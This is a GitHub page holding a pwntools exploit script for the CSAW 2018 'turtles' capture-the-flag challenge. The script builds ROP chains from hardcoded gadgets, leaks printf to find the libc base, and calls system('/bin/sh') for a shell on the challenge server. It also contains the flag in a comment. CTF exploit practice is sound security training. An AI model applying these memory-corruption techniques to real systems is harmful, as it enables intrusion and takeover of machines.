ctfs/CSAW18/turtles/turtles.py at master · vakzz/ctfs · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#!/usr/bin/env python

from pwn import *

pop4_ret = 0x400d3c # : pop r12; pop r13; pop r14; pop r15; ret;
pop_rbp = 0x400ac0 # : pop rbp; ret;
leave_ret = 0x400b82 #: leave; ret;
pop_rdi = 0x400d43 #: pop rdi; ret;
pop2_rsi = 0x400d41 #: pop rsi; pop r15; ret;
mov_eax_0 = 0x0000000000400cbc # : mov eax, 0; add rsp, 0x838; pop rbx; pop rbp; ret;

def exploit():
  p.recvuntil("Here is a Turtle: 0x")
  turtle = int(p.recvline(keepends=False), 16)
  log.info("turtle: 0x{:x}".format(turtle))

  rop = ROP(name)
  rop.read(0, turtle)
  rop.raw(pop_rbp)
  rop.raw(turtle-8)
  rop.raw(leave_ret)

  offset = 0x20
  base = turtle + offset

  payload = ""
  payload += p64(base)
  payload += str(rop)
  payload = payload.ljust(64 + offset, "\x00")

  payload += p64(base + 0x80 - 0x28)

  payload = payload.ljust(0x60 + offset, "B")
  payload += p64(base + 0x90)

  payload = payload.ljust(0x80 + offset, "C")
  payload += p64(10)
  payload += p64(11)

  payload += p64(pop4_ret)

  p.sendline(payload)

  pause(2)

  rop2 = ROP(name)
  rop2.raw(mov_eax_0)
  rop2.raw("A"*(0x838 + 16))
  rop2.printf(binary.got["printf"], 0)
  rop2.main()

  p.sendline(str(rop2))

  printf = u64(p.recv(6).ljust(8, "\x00"))
  log.info("printf: 0x{:x}".format(printf))
  libc.address = printf - libc.symbols["printf"]
  log.info("libc: 0x{:x}".format(libc.address ))


  p.recvuntil("Here is a Turtle: 0x")
  turtle2 = int(p.recvline(keepends=False), 16)
  log.info("turtle2: 0x{:x}".format(turtle2))


  rop3 = ROP(libc)
  rop3.system(next(libc.search('/bin/sh\x00')))

  offset = 0x20
  base = turtle2 + offset

  payload = ""
  payload += p64(base)
  payload += str(rop3)
  payload = payload.ljust(64 + offset, "\x00")

  payload += p64(base + 0x80 - 0x28)

  payload = payload.ljust(0x60 + offset, "B")
  payload += p64(base + 0x90)

  payload = payload.ljust(0x80 + offset, "C")
  payload += p64(10)
  payload += p64(11)

  payload += p64(pop4_ret)

  p.sendline(payload)

  p.interactive()

  # flag{i_like_turtl3$_do_u?}


if __name__ == "__main__":
  name = "./turtles"
  binary = ELF(name)

  libc_name = "libs/libc.so.6"
  libc = ELF(libc_name)

  context.terminal=["tmux", "sp", "-h"]

  context.arch = "amd64"
  context.os = "linux"

  if len(sys.argv) > 1:
    p = remote("pwn.chal.csaw.io", 9003)
  else:
    p = process(name, env={'LD_LIBRARY_PATH': './libs/'})

  exploit()